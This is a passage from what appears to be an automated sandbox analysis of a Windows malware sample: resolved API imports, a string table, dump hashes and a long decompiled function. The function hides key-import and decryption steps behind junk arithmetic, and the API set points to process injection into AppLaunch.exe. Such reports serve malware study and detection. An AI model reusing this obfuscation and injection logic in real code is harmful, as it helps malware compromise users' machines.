                                                • GetProcAddress.KERNEL32(00000000,CryptGetHashParam), ref: 004EF097
                                                • GetProcAddress.KERNEL32(00000000,CryptDestroyHash), ref: 004EF0F9
                                                • GetProcAddress.KERNEL32(00000000,GetCurrentHwProfileW), ref: 004EF15F
                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,GetCurrentHwProfileW,0000000D,00000000,CryptDestroyHash,0BC3E19A,00000000,CryptGetHashParam,004FC554,00000000,CryptHashData,00000000,CryptCreateHash,00000000,CryptDecrypt), ref: 004EF16E
                                                • GetProcAddress.KERNEL32(00000000,VirtualAllocEx), ref: 004EF267
                                                • GetProcAddress.KERNEL32(00000000,WriteProcessMemory), ref: 004EF33E
                                                • GetProcAddress.KERNEL32(00000000,VirtualAlloc), ref: 004EF351
                                                • GetProcAddress.KERNEL32(00000000,VirtualFree), ref: 004EF562
                                                • GetProcAddress.KERNEL32(00000000,VirtualProtect), ref: 004EF681
                                                • GetProcAddress.KERNEL32(00000000,LoadLibraryA), ref: 004EF6EA
                                                • GetProcAddress.KERNEL32(00000000,FreeLibrary), ref: 004EF6FD
                                                • GetProcAddress.KERNEL32(00000000,HeapFree), ref: 004EF710
                                                • GetProcAddress.KERNEL32(00000000,GetProcessHeap), ref: 004EF7BD
                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004EF85C
                                                • GetProcAddress.KERNEL32(00000000,IsBadReadPtr), ref: 004EF8C2
                                                • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 004EF8D5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: AddressProc$HandleModule
                                                • String ID: 2$?$AppLaunch.exe$CNBJOP78.DLL$CloseHandle$CreateFileW$CreateProcessW$CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$DeleteFileW$EtwEventWriteStartScenario$FreeLibrary$GetCurrentHwProfileW$GetCurrentProcess$GetLocalManagedApplicationData$GetNativeSystemInfo$GetProcAddress$GetProcessHeap$GetShortPathNameW$GetTempPathW$GetWindowsDirectoryW$HeapFree$InvalidateRect$IsBadReadPtr$LoadLibraryA$NlsData0020.dll$NlsLexicons081a.dll$NtQueryVirtualMemory$R$ReadFile$ReadProcessMemory$RtlAllocateHeap$RtlDecompressBuffer$RtlGetLastWin32Error$RtlSetLastWin32Error$SHGetPathFromIDListW$SHGetSpecialFolderLocation$SetFileAttributesW$SetLocaleInfoA$System.ComponentModel.DataAnnotations.ni.dll$VirtualAlloc$VirtualAllocEx$VirtualFree$VirtualProtect$WMPhoto.dll$WriteFile$WriteProcessMemory$ZwClearEvent$advapi32.dll$cfgbkend.dll$ipconfig.exe$kernel32.dll$ntdll.dll$shell32.dll$spwizeng.dll$tssysprep.dll$wdscore.dll
                                                • API String ID: 667068680-2459333046
                                                • Opcode ID: 6e08dfd0d88ddc9699ce075d64fa0759abac629e821831dcae6dc328a8b4c4a5
                                                • Instruction ID: 2bbd392d19f757f3a687120a25d96ce2b5ea6e8b65b94c8f12cd8589c0bc2803
                                                • Opcode Fuzzy Hash: 6e08dfd0d88ddc9699ce075d64fa0759abac629e821831dcae6dc328a8b4c4a5
                                                • Instruction Fuzzy Hash: 5513B375910249AFDB00DFAAE985A6D7BF1FB08306B10483AE504E7371D379A960CF6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E004F0FBC(BYTE* __eax, void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr* _a4) {
                                                				BYTE* _v8;
                                                				intOrPtr _v12;
                                                				intOrPtr* _v16;
                                                				char _v17;
                                                				char _v24;
                                                				char _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				signed int _v48;
                                                				signed int _v52;
                                                				signed int _v56;
                                                				signed int _v60;
                                                				signed int _v64;
                                                				signed int _v68;
                                                				signed int _v72;
                                                				signed int _v76;
                                                				signed int _v80;
                                                				signed int _v84;
                                                				signed int _v88;
                                                				signed int _v92;
                                                				long* _v96;
                                                				long* _v100;
                                                				long* _v104;
                                                				long* _v108;
                                                				int _v112;
                                                				BYTE* _v116;
                                                				BYTE* _v120;
                                                				intOrPtr _v124;
                                                				signed int _v128;
                                                				int _v132;
                                                				char _v136;
                                                				intOrPtr _v140;
                                                				intOrPtr _v144;
                                                				char _v148;
                                                				intOrPtr _v152;
                                                				intOrPtr _v156;
                                                				signed int _v160;
                                                				intOrPtr _v164;
                                                				intOrPtr _v168;
                                                				signed int _v172;
                                                				signed int _v176;
                                                				signed int _v180;
                                                				signed int _t973;
                                                				signed int _t977;
                                                				signed int _t981;
                                                				signed int _t983;
                                                				signed int _t984;
                                                				signed int _t989;
                                                				signed int _t999;
                                                				int _t1011;
                                                				signed int _t1012;
                                                				signed int _t1032;
                                                				signed int _t1036;
                                                				signed int _t1037;
                                                				signed int _t1038;
                                                				signed int _t1039;
                                                				signed int _t1043;
                                                				int _t1049;
                                                				signed int _t1051;
                                                				signed int _t1054;
                                                				signed int _t1073;
                                                				signed int _t1074;
                                                				signed int _t1075;
                                                				signed int _t1076;
                                                				signed int _t1077;
                                                				signed int _t1078;
                                                				signed int _t1079;
                                                				signed int _t1084;
                                                				signed int _t1085;
                                                				signed int _t1086;
                                                				signed int _t1087;
                                                				signed int _t1090;
                                                				int _t1095;
                                                				signed int _t1104;
                                                				signed int _t1111;
                                                				signed int _t1112;
                                                				signed int _t1114;
                                                				signed int _t1116;
                                                				signed int _t1129;
                                                				signed int _t1130;
                                                				signed int _t1131;
                                                				signed int _t1133;
                                                				signed int _t1137;
                                                				signed int _t1141;
                                                				signed int _t1145;
                                                				signed int _t1146;
                                                				signed int _t1152;
                                                				signed int _t1158;
                                                				signed int _t1161;
                                                				signed int _t1163;
                                                				signed int _t1167;
                                                				intOrPtr _t1168;
                                                				signed int _t1172;
                                                				signed int _t1173;
                                                				signed int _t1175;
                                                				signed int _t1177;
                                                				signed int _t1178;
                                                				signed int _t1179;
                                                				signed int _t1189;
                                                				signed int _t1221;
                                                				signed int _t1223;
                                                				signed int _t1227;
                                                				signed int _t1229;
                                                				signed int _t1230;
                                                				signed int _t1237;
                                                				signed int _t1238;
                                                				signed int _t1241;
                                                				signed int _t1244;
                                                				signed int _t1248;
                                                				int _t1254;
                                                				signed int _t1258;
                                                				signed int _t1260;
                                                				signed int _t1262;
                                                				signed int _t1269;
                                                				signed int _t1270;
                                                				signed int _t1277;
                                                				signed int _t1279;
                                                				signed int _t1280;
                                                				signed int _t1282;
                                                				signed int _t1283;
                                                				signed int _t1288;
                                                				signed int _t1290;
                                                				signed int _t1292;
                                                				signed int _t1293;
                                                				signed int _t1296;
                                                				int _t1314;
                                                				void* _t1316;
                                                				signed int _t1319;
                                                				signed int _t1321;
                                                				signed int _t1322;
                                                				signed int _t1323;
                                                				void* _t1328;
                                                				signed int _t1330;
                                                				signed int _t1332;
                                                				signed int _t1349;
                                                				signed int _t1350;
                                                				signed int _t1352;
                                                				signed int _t1353;
                                                				signed int _t1355;
                                                				signed int _t1357;
                                                				signed int _t1359;
                                                				signed int _t1367;
                                                				signed int _t1368;
                                                				signed int _t1375;
                                                				signed int _t1382;
                                                				signed int _t1383;
                                                				signed int _t1385;
                                                				signed int _t1386;
                                                				signed int _t1388;
                                                				signed int _t1401;
                                                				signed int _t1411;
                                                				signed int _t1412;
                                                				signed int _t1414;
                                                				signed int _t1415;
                                                				signed int _t1416;
                                                				signed int _t1417;
                                                				signed int _t1418;
                                                				signed int _t1419;
                                                				signed int _t1421;
                                                				signed int _t1430;
                                                				signed int _t1431;
                                                				signed int _t1433;
                                                				signed int _t1434;
                                                				signed int _t1435;
                                                				void* _t1440;
                                                				signed int _t1441;
                                                				signed int _t1445;
                                                				intOrPtr _t1449;
                                                				signed int _t1455;
                                                				signed int _t1457;
                                                				signed int _t1459;
                                                				signed int _t1461;
                                                				signed int _t1462;
                                                				signed int _t1464;
                                                				signed int _t1466;
                                                				signed int _t1468;
                                                				int _t1473;
                                                				signed int _t1478;
                                                				signed int _t1481;
                                                				signed int _t1484;
                                                				signed int _t1494;
                                                				signed int _t1498;
                                                				signed int _t1500;
                                                				signed int _t1501;
                                                				signed int _t1507;
                                                				signed int _t1509;
                                                				signed int _t1510;
                                                				signed int _t1512;
                                                				signed int _t1514;
                                                				signed int _t1515;
                                                				signed int _t1521;
                                                				signed int _t1524;
                                                				signed int _t1528;
                                                				signed int _t1529;
                                                				signed int _t1536;
                                                				signed int _t1538;
                                                				signed int _t1539;
                                                				signed int _t1540;
                                                				signed int _t1542;
                                                				signed int _t1544;
                                                				intOrPtr _t1548;
                                                				signed int _t1562;
                                                				signed int _t1564;
                                                				signed int _t1565;
                                                				signed int _t1572;
                                                				signed int _t1585;
                                                				signed int _t1586;
                                                				signed int _t1588;
                                                				signed int _t1592;
                                                				signed int _t1594;
                                                				signed int _t1603;
                                                				signed int _t1605;
                                                				signed int _t1606;
                                                				signed int _t1607;
                                                				signed int _t1608;
                                                				signed int _t1609;
                                                				signed int _t1611;
                                                				signed int _t1613;
                                                				signed int _t1621;
                                                				signed int _t1625;
                                                				signed int _t1629;
                                                				signed int _t1632;
                                                				signed int _t1635;
                                                				signed int _t1646;
                                                				signed int _t1654;
                                                				signed int _t1657;
                                                				signed int _t1658;
                                                				signed int _t1661;
                                                				signed int _t1664;
                                                				signed int _t1665;
                                                				signed int _t1668;
                                                				signed int _t1678;
                                                				signed int _t1683;
                                                				signed int _t1685;
                                                				signed int _t1686;
                                                				signed int _t1687;
                                                				signed int _t1691;
                                                				signed int _t1693;
                                                				signed int _t1695;
                                                				void* _t1697;
                                                				signed int _t1699;
                                                				signed int _t1706;
                                                				signed int _t1724;
                                                				signed int _t1732;
                                                				signed int _t1734;
                                                				signed int _t1741;
                                                				signed int _t1749;
                                                				signed int _t1756;
                                                				signed int _t1758;
                                                				signed int _t1760;
                                                				signed int _t1766;
                                                				signed int _t1771;
                                                				signed int _t1773;
                                                				signed int _t1776;
                                                				signed int _t1779;
                                                				signed int _t1780;
                                                				signed int _t1785;
                                                				signed int _t1787;
                                                				signed int _t1788;
                                                				signed int _t1795;
                                                				signed int _t1808;
                                                				signed int _t1815;
                                                				signed int _t1823;
                                                				signed int _t1824;
                                                				signed int _t1830;
                                                				signed int _t1847;
                                                				signed int _t1848;
                                                				signed int _t1851;
                                                				signed int _t1852;
                                                				signed int _t1859;
                                                				signed int _t1865;
                                                				signed int _t1884;
                                                				signed int _t1894;
                                                				signed int _t1897;
                                                				signed int _t1906;
                                                				signed int _t1910;
                                                				signed int _t1915;
                                                				signed int _t1916;
                                                				intOrPtr _t1920;
                                                				intOrPtr _t1921;
                                                				intOrPtr _t1926;
                                                				intOrPtr _t1929;
                                                				intOrPtr _t1949;
                                                				signed int _t1953;
                                                				intOrPtr _t1956;
                                                				intOrPtr _t1973;
                                                				intOrPtr _t1975;
                                                				signed int _t1976;
                                                				intOrPtr _t1981;
                                                				signed int _t1990;
                                                				signed int _t1993;
                                                				signed int _t2004;
                                                				signed int _t2009;
                                                				intOrPtr _t2018;
                                                				void* _t2022;
                                                				void* _t2023;
                                                				intOrPtr* _t2024;
                                                				void* _t2030;
                                                				void* _t2045;
                                                				void* _t2048;
                                                				void* _t2062;
                                                				void* _t2064;
                                                				void* _t2081;
                                                				void* _t2093;
                                                				void* _t2103;
                                                				void* _t2136;
                                                				void* _t2138;
                                                				void* _t2139;
                                                				void* _t2140;
                                                				void* _t2150;
                                                				void* _t2159;
                                                
                                                				_t2022 = _t2023;
                                                				_t2024 = _t2023 + 0xffffff50;
                                                				_push(__ebx);
                                                				_v24 = 0;
                                                				_v28 = 0;
                                                				_v16 = __ecx;
                                                				_v12 = __edx;
                                                				_v8 = __eax;
                                                				_push(_t2022);
                                                				_push(0x4f31f8);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t2024;
                                                				_t973 = E004FEF38; // 0xc3c34fdc
                                                				_t1910 = E004FEF2C; // 0xa1d900
                                                				if(_t973 -  *0x4fef04 > _t1910 -  *0x4fef04) {
                                                					_v84 = 0;
                                                					while(_v84 < 0xe) {
                                                						_v84 = _v84 + 1;
                                                						_t2018 =  *0x4fef24; // 0x0
                                                						if(E00407774(L"davclnt.dll", 1, _t2018) >= 0xb0) {
                                                							_t1851 =  *0x4fef44; // 0x38993
                                                							 *0x4feeec = _t1851;
                                                							_t1852 =  *0x4feef0; // 0x44632301
                                                							 *0x4feef0 = E0040489C(_t1852);
                                                						} else {
                                                							_t1859 = E004FEED0; // 0xc3c34ef0
                                                							E004FEED0 = E0040489C(_t1859);
                                                						}
                                                						_v56 = 0x4d - _v32;
                                                						_v180 = _v88 + 0x15;
                                                						asm("fild dword [ebp-0xb0]");
                                                						_v60 = E004048CC();
                                                					}
                                                					asm("fild dword [ebp-0x40]");
                                                					_v72 = E004048CC();
                                                					_v36 = _v48 - 0x30;
                                                					_t1847 = E004FEF20; // 0x6e687a1a
                                                					 *0x4feea0 = _t1847;
                                                					_t1848 =  *0x4fef04; // 0x43c14963
                                                					 *0x4feecc = _t1848;
                                                				}
                                                				 *0x4feef4 = 0xdd - E004FEED0;
                                                				_t977 =  *0x4fef44; // 0x38993
                                                				 *0x4fef14 = _t977 -  *0x4fef3c;
                                                				E004FEF34 = 0x72 - E004FEF2C;
                                                				_t981 =  *0x4fef40; // 0x3c79b5d4
                                                				 *0x4fef48 = _t981 + 0x70;
                                                				_t983 = E004FEF10; // 0x1cb931c0
                                                				E004FEF50 = _t983;
                                                				_t984 = E004FEF50; // 0xa3b3f6c0
                                                				_t2030 = _t984 -  *0x4feecc; // 0xd26bafe0
                                                				if(_t2030 < 0) {
                                                					E00406CF4( &_v24, L"CNB_0317.DLL");
                                                				}
                                                				_v17 = 0;
                                                				_v60 = _v92 * _v76;
                                                				_v64 = _v68 - 4;
                                                				_t989 =  *0x4fef18; // 0xbc3e19a
                                                				 *0x4fef18 = E0040489C(_t989);
                                                				_v36 = _v32 - 0xdd;
                                                				_v84 = _v44 + 0x51;
                                                				_v80 = _v40;
                                                				_push(_t2022);
                                                				_push(0x4f30c8);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t2024;
                                                				E004F0EBC( &E004FEF0C,  &E004FEF10, _t2030);
                                                				_t999 = E004FEF10; // 0x1cb931c0
                                                				 *0x4feeec = _t999;
                                                				E00407678(_v24, 0, 1,  &_v24);
                                                				_v52 = _v40 - _v48;
                                                				_v56 = _v84 - 0x2e;
                                                				_push(_v92);
                                                				_t1865 =  *0x4fef4c; // 0x43c1493c
                                                				_t1915 = E004FEF10; // 0x1cb931c0
                                                				_v76 = E004EE798(_v84, 0, _t1865, _t1915, _t2030);
                                                				_t1011 = CryptAcquireContextA( &_v104, 0, 0, 1, 0xf0000000); // executed
                                                				if(_t1011 == 0) {
                                                					_t1012 =  *0x4fef48; // 0xc3c34ef0
                                                					_t1916 =  *0x4fef4c; // 0x43c1493c
                                                					_v92 = E004EE798(_v64, 0, _v40, _t1916, __eflags);
                                                					 *0x4feeec = E004F0EBC( &_v48,  &_v68, __eflags);
                                                					_v48 = _v56 + _v84;
                                                					E00406CF4( &_v24, _v24);
                                                					_v88 = _v36 - _v76;
                                                					_v60 = _v68 * _v64;
                                                					_t1920 = _t1012;
                                                					 *[fs:eax] = _t1920;
                                                					__eflags = 0;
                                                					_pop(_t1921);
                                                					 *[fs:eax] = _t1921;
                                                					_push(E004F31FF);
                                                					return E00406A08( &_v28, 2);
                                                				} else {
                                                					_push(_t2022);
                                                					_push(0x4f2ff6);
                                                					_push( *[fs:eax]);
                                                					 *[fs:eax] = _t2024;
                                                					E00406CF4( &_v24, L"mqcertui.dll");
                                                					_t1032 =  *0x4fef48; // 0xc3c34ef0
                                                					 *0x4feed8 = _t1032;
                                                					_v148 = _v28;
                                                					if(_v148 != 0) {
                                                						_v148 =  *((intOrPtr*)(_v148 - 4));
                                                					}
                                                					if(_v148 <= 9) {
                                                						_v72 = _v92 * _v32;
                                                						_t1036 =  *0x4feedc; // 0xbc3e19a
                                                						 *0x4fef3c = _t1036;
                                                						_t1037 =  *0x4fef3c; // 0x1cb932a9
                                                						__eflags = _t1037 -  *0x4feed8; // 0x1cb9338e
                                                						if(__eflags >= 0) {
                                                							_t1038 = E004FEED0; // 0xc3c34ef0
                                                							 *0x4fef14 = _t1038;
                                                						} else {
                                                							E00407640(_v28, _v24);
                                                							if(__eflags != 0) {
                                                								_v80 = _v36 - _v64;
                                                							} else {
                                                								_t1830 =  *0x4feecc; // 0xd26bafe0
                                                								 *0x4feecc = E0040489C(_t1830);
                                                							}
                                                						}
                                                					} else {
                                                						_v44 = _v40 + _v40 * 2 + (_v40 + _v40 * 2) * 8;
                                                						_v52 = 0;
                                                						do {
                                                							_v56 = _v76 * _v84;
                                                							_v52 = _v52 + 1;
                                                						} while (_v52 != 0xc);
                                                					}
                                                					_t1039 =  *0x4fef14; // 0xb52124ca
                                                					 *0x4feea0 = _t1039 *  *0x4fef28;
                                                					if(_v52 - _v40 == _v36) {
                                                						_t1824 =  *0x4fef28; // 0x3c79b5d4
                                                						 *0x4feefc = _t1824 + 0xf;
                                                					}
                                                					_t1043 =  *0x4fef4c; // 0x43c1493c
                                                					E004FEF2C = (_t1043 << 2) + (_t1043 << 2) * 2;
                                                					_t1049 = CryptImportKey(_v104, _v8, 0x254, 0, 0,  &_v108); // executed
                                                					if(_t1049 == 0) {
                                                						_pop(_t1926);
                                                						 *[fs:eax] = _t1926;
                                                						_push(E004F3000);
                                                						_t1051 = E004FEF20; // 0x6e687a1a
                                                						 *0x4feea0 = _t1051;
                                                						_v32 = 0x3c - _v56;
                                                						_t1054 =  *0x4fef48; // 0xc3c34ef0
                                                						 *0x4feedc = _t1054;
                                                						__eflags = 0;
                                                						_v40 = 0;
                                                						do {
                                                							_v180 = _v44 + 0x3e;
                                                							asm("fild dword [ebp-0xb0]");
                                                							_v48 = E004048CC();
                                                							_v40 = _v40 + 1;
                                                							__eflags = _v40 - 0xc;
                                                						} while (_v40 != 0xc);
                                                						_v88 = _v68 * 0x4e;
                                                						CryptReleaseContext(_v104, 0);
                                                						_v40 = _v60 + _v76;
                                                						_v44 = _v92 + _v56;
                                                						_v48 = _v68 + 4;
                                                						_v80 = _v84 * 0x5c;
                                                						__eflags = 0xf6;
                                                						 *0x4fef40 = 0xf6 -  *0x4fef30;
                                                						E00407640(_v28, L"api-ms-win-core-datetime-l1-1-0.dll");
                                                						if(__eflags != 0) {
                                                							_t1073 =  *0x4feed8; // 0x1cb9338e
                                                							E004FEF2C = _t1073;
                                                							return _t1073;
                                                						}
                                                						_t1074 =  *0x4fef40; // 0x3c79b5d4
                                                						E004FEF50 = _t1074;
                                                						_t1075 =  *0x4fef30; // 0xa1d816
                                                						 *0x4feea0 = _t1075;
                                                						_t1076 =  *0x4feea0; // 0xa1d900
                                                						__eflags = _t1076 - E004FEF50; // 0xa3b3f6c0
                                                						if(__eflags <= 0) {
                                                							_t1077 =  *0x4feed8; // 0x1cb9338e
                                                							_t1078 = _t1077 + E004FEF00;
                                                							E004FEF10 = _t1078;
                                                							return _t1078;
                                                						}
                                                						_t1079 =  *0x4feea0; // 0xa1d900
                                                						 *0x4feedc = _t1079;
                                                						return _t1079;
                                                					}
                                                					_v52 = _v44;
                                                					if(_v32 - _v84 == _v56) {
                                                						_v64 = _v32 * 0xe7;
                                                						E00406CF4( &_v28, L"repdrvfs.dll");
                                                						_v76 = 0;
                                                						while(_v76 < 5) {
                                                							_v76 = _v76 + 1;
                                                							_v88 = 0;
                                                							do {
                                                								_t1823 = E004FEF20; // 0x6e687a1a
                                                								 *0x4feea0 = _t1823;
                                                								_v88 = _v88 + 1;
                                                							} while (_v88 != 5);
                                                						}
                                                					}
                                                					_v48 = _v36 * 0xc8;
                                                					_t1084 =  *0x4fef18; // 0xbc3e19a
                                                					E004FEF00 = _t1084;
                                                					_t1085 = E004FEF00; // 0xa3b3f6c0
                                                					 *0x4fef04 = _t1085;
                                                					_t1086 = E004FEF00; // 0xa3b3f6c0
                                                					_t2045 = _t1086 -  *0x4fef04; // 0x43c14963
                                                					if(_t2045 > 0) {
                                                						_v92 = 0xab - _v80;
                                                					}
                                                					_t1087 = E004FEF10; // 0x1cb931c0
                                                					_v180 = _t1087 + 4;
                                                					asm("fild dword [ebp-0xb0]");
                                                					E004FEF50 = E004048D8();
                                                					_t1090 =  *0x4feef0; // 0x44632301
                                                					_push(_t1090);
                                                					E004EE798(_v56, 0, _v88, _v48, 0xab);
                                                					_push(_t2022);
                                                					_push(0x4f2efa);
                                                					_push( *[fs:eax]);
                                                					 *[fs:eax] = _t2024;
                                                					_t1095 = CryptAcquireContextA( &_v96, 0, 0, 0x18, 0xf0000000); // executed
                                                					if(_t1095 == 0) {
                                                						_v56 = _v36 + 0x76;
                                                						_v60 = _v76 + _v92;
                                                						_v64 = _v44 * 0x7b;
                                                						_v32 = _v68 * 0xf5;
                                                						_v80 = _v52 + 0xea;
                                                						_t1104 = E004FEF2C; // 0xa1d900
                                                						 *0x4feea0 = _t1104 + E004FEED0;
                                                						_pop(_t1929);
                                                						 *[fs:eax] = _t1929;
                                                						_push(E004F2F04);
                                                						_v56 = _v72 * _v44;
                                                						_v60 = _v48 + _v48 * 4;
                                                						_t1111 = E004FEF38; // 0xc3c34fdc
                                                						 *0x4fef18 = _t1111;
                                                						_t1112 = E004FEF20; // 0x6e687a1a
                                                						E004FEF20 = E0040489C(_t1112);
                                                						_t1114 = E004FEF2C; // 0xa1d900
                                                						__eflags = _t1114 -  *0x4fef4c - 0x3d;
                                                						if(_t1114 -  *0x4fef4c >= 0x3d) {
                                                							_t1116 =  *0x4fef44; // 0x38993
                                                							__eflags = _t1116 + E004FEF34 - E004FEF34; // 0xc3c34ef0
                                                							if(__eflags == 0) {
                                                								_v84 = 0;
                                                								__eflags = _v84 - 0xc;
                                                								while(_v84 < 0xc) {
                                                									_v84 = _v84 + 1;
                                                									E00406CF4( &_v24, _v24);
                                                									__eflags = _v84 - 0xc;
                                                								}
                                                							}
                                                						} else {
                                                							_t1145 = E004FEF34; // 0xc3c34ef0
                                                							E004FEF34 = _t1145;
                                                							_t1146 = E004FEF34; // 0xc3c34ef0
                                                							__eflags = _t1146 - E004FEF20; // 0x6e687a1a
                                                							if(__eflags >= 0) {
                                                								_v40 = _v64 - 0x8a;
                                                							} else {
                                                								_v32 = 0;
                                                								__eflags = _v32 - 0xe;
                                                								while(__eflags < 0) {
                                                									_v32 = _v32 + 1;
                                                									 *0x4fef48 = E004F0EBC( &_v68,  &E004FEF2C, __eflags);
                                                									__eflags = _v32 - 0xe;
                                                								}
                                                							}
                                                						}
                                                						_v76 = _v68 + 0x7a;
                                                						CryptDestroyKey(_v108);
                                                						E00406CF4( &_v24, _v24);
                                                						E004F0EBC( &_v64,  &_v68, __eflags);
                                                						_v40 = _v80 * 0xe9;
                                                						_v44 = _v60 * _v68;
                                                						_t1129 =  *0x4fef4c; // 0x43c1493c
                                                						 *0x4feef0 = _t1129;
                                                						_t1130 = E004FEF38; // 0xc3c34fdc
                                                						 *0x4feef4 = _t1130;
                                                						_t1131 =  *0x4feef0; // 0x44632301
                                                						__eflags = _t1131 -  *0x4feef4; // 0xb52124ca
                                                						if(__eflags <= 0) {
                                                							_t1133 = _v76 + 0xb7;
                                                							__eflags = _t1133;
                                                							_v56 = _t1133;
                                                						} else {
                                                							_t1141 =  *0x4feed8; // 0x1cb9338e
                                                							E004FEF0C = _t1141;
                                                						}
                                                						__eflags = _v80 - _v76 - 0xb7;
                                                						if(_v80 - _v76 >= 0xb7) {
                                                							_t1137 = _v64 + _v32;
                                                							__eflags = _t1137;
                                                							_v48 = _t1137;
                                                							return _t1137;
                                                						}
                                                						_v84 = 0;
                                                						__eflags = _v84 - 0xe;
                                                						if(_v84 < 0xe) {
                                                							_v84 = _v84 + 1;
                                                							return E00406CF4( &_v24, _v24);
                                                						}
                                                						return 0;
                                                					} else {
                                                						_t1152 =  *0x4fef30; // 0xa1d816
                                                						_t2048 = _t1152 +  *0x4fef4c -  *0x4fef4c; // 0x43c1493c
                                                						if(_t2048 <= 0) {
                                                							E00407678(_v24, 0, 1,  &_v24);
                                                							_t1158 = _v88 << 2;
                                                							__eflags = _t1158;
                                                							_v40 = _t1158 + _t1158 * 2;
                                                						} else {
                                                							_v84 = 0;
                                                							while(_v84 < 0xb) {
                                                								_v84 = _v84 + 1;
                                                								_t1815 =  *0x4fef30; // 0xa1d816
                                                								 *0x4feecc = _t1815;
                                                							}
                                                							_v44 = _v32 - _v72;
                                                							_t1808 =  *0x4feef0; // 0x44632301
                                                							 *0x4feef0 = E0040489C(_t1808);
                                                							_v52 = 0;
                                                							while(_v52 < 0) {
                                                								_v52 = _v52 + 1;
                                                								_v180 = _v92 + 4;
                                                								asm("fild dword [ebp-0xb0]");
                                                								_v64 = E004048D8();
                                                							}
                                                							_v76 = _v80 * 0x2a;
                                                						}
                                                						asm("fild dword [0x4feee0]");
                                                						E004FEF20 = E004048CC();
                                                						 *0x4fef40 =  *0x4fef40 - 0xd6;
                                                						_t1161 =  *0x4feef0; // 0x44632301
                                                						 *0x4feedc = _t1161 + 4;
                                                						_t1163 =  *0x4fef4c; // 0x43c1493c
                                                						E004FEF00 = _t1163 * E004FEF50;
                                                						_push(_t2022);
                                                						_push(0x4f2d41);
                                                						_push( *[fs:eax]);
                                                						 *[fs:eax] = _t2024;
                                                						_v84 = 0;
                                                						while(_v84 < 8) {
                                                							_v84 = _v84 + 1;
                                                							_t1795 =  *0x4fef14; // 0xb52124ca
                                                							 *0x4feea0 = _t1795;
                                                							_v48 = _v40 - _v64;
                                                							_v60 = 0;
                                                							while(_v60 < 2) {
                                                								_v60 = _v60 + 1;
                                                								_v72 = _v92 + 0x30;
                                                							}
                                                							if(0x96 - _v52 < 0x31) {
                                                								E00406CF4( &_v24, L"System.Runtime.Remoting.dll");
                                                							}
                                                						}
                                                						_t1167 =  *0x4feee8; // 0xdcd0f434
                                                						 *0x4feefc = _t1167;
                                                						_t1168 =  *0x4fef1c; // 0x0
                                                						_v152 = _t1168;
                                                						if(_v152 != 0) {
                                                							_v152 =  *((intOrPtr*)(_v152 - 4));
                                                						}
                                                						if(_v152 <= 0x1b) {
                                                							E00407678(_v24, 0, 1,  &_v24);
                                                							_t1172 = E004FEF0C * 0xdb;
                                                							__eflags = _t1172;
                                                							 *0x4feef4 = _t1172;
                                                						} else {
                                                							_v68 = _v36 * _v56;
                                                							_t1785 = E004FEF50; // 0xa3b3f6c0
                                                							E004FEF38 = _t1785;
                                                							_v32 = 0;
                                                							do {
                                                								_t1787 =  *0x4fef3c; // 0x1cb932a9
                                                								E004FEF50 = _t1787;
                                                								_t1788 =  *0x4feea0; // 0xa1d900
                                                								_t2062 = _t1788 - E004FEF50; // 0xa3b3f6c0
                                                								if(_t2062 <= 0) {
                                                									asm("fild dword [0x4feee8]");
                                                									 *0x4fef28 = E004048D8();
                                                								} else {
                                                									E004FEF34 = E004F0EBC( &_v44,  &_v72, _t2062);
                                                								}
                                                								_v32 = _v32 + 1;
                                                							} while (_v32 != 9);
                                                						}
                                                						_t1173 = E004FEF20; // 0x6e687a1a
                                                						E004FEF2C = _t1173 + E004FEF34;
                                                						_t1175 =  *0x4fef04; // 0x43c14963
                                                						 *0x4fef48 = _t1175 + 9;
                                                						_t1177 = E004FEED0; // 0xc3c34ef0
                                                						E004FEF50 = _t1177;
                                                						_t1178 =  *0x4feea0; // 0xa1d900
                                                						_t2064 = _t1178 - E004FEF50; // 0xa3b3f6c0
                                                						if(_t2064 <= 0) {
                                                							_t1179 =  *0x4fef40; // 0x3c79b5d4
                                                							E004FEF00 = _t1179;
                                                						} else {
                                                							_t1780 = E004FEF34; // 0xc3c34ef0
                                                							_push(_t1780);
                                                							E004FEF0C = E004EE798(_v60, 0, _v36, _v92, _t2064);
                                                						}
                                                						_v124 =  *_a4 + _v12 - 0x80;
                                                						_v116 = E004044B4(0x100);
                                                						_v44 = _v48 + 0xc8;
                                                						asm("fild dword [ebp-0x4c]");
                                                						_v52 = E004048D8();
                                                						_t1189 =  *0x4feee8; // 0xdcd0f434
                                                						 *0x4fef04 = _t1189;
                                                						E00406CF4( &_v24, L"NetEnumerateServiceAccounts");
                                                						_v88 = 0;
                                                						while(_v88 < 5) {
                                                							_v88 = _v88 + 1;
                                                							_t1773 = E004FEF38; // 0xc3c34fdc
                                                							if(_t1773 -  *0x4feef0 >= 0x63) {
                                                								_t1776 = _v56 + 4;
                                                								__eflags = _t1776;
                                                								_v180 = _t1776;
                                                								asm("fild dword [ebp-0xb0]");
                                                								_v40 = E004048D8();
                                                							} else {
                                                								_v72 = 0;
                                                								while(_v72 < 0xa) {
                                                									_v72 = _v72 + 1;
                                                									_t1779 =  *0x4feedc; // 0xbc3e19a
                                                									 *0x4feedc = _t1779;
                                                								}
                                                							}
                                                						}
                                                						_v76 = (_v68 << 4) + (_v68 << 4) * 2;
                                                						_push(_t2022);
                                                						_push(0x4f2c8c);
                                                						_push( *[fs:eax]);
                                                						 *[fs:eax] = _t2024;
                                                						_v52 = _v84 + 0x7f;
                                                						_v68 = _v64 * _v80;
                                                						_v72 = _v36 - _v60;
                                                						_v92 = 0;
                                                						if(_v92 < 2) {
                                                							_v92 = _v92 + 1;
